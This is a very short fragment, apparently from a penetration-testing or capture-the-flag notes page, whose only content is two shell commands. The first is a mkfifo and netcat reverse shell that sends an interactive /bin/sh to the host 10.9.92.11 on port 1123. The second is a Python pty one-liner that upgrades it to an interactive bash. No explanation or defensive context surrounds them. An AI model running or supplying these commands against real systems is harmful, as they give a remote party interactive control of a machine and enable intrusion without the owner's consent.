Last updated 1 year ago
Was this helpful?
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.92.11 1123 >/tmp/f
python -c 'import pty; pty.spawn("/bin/bash")'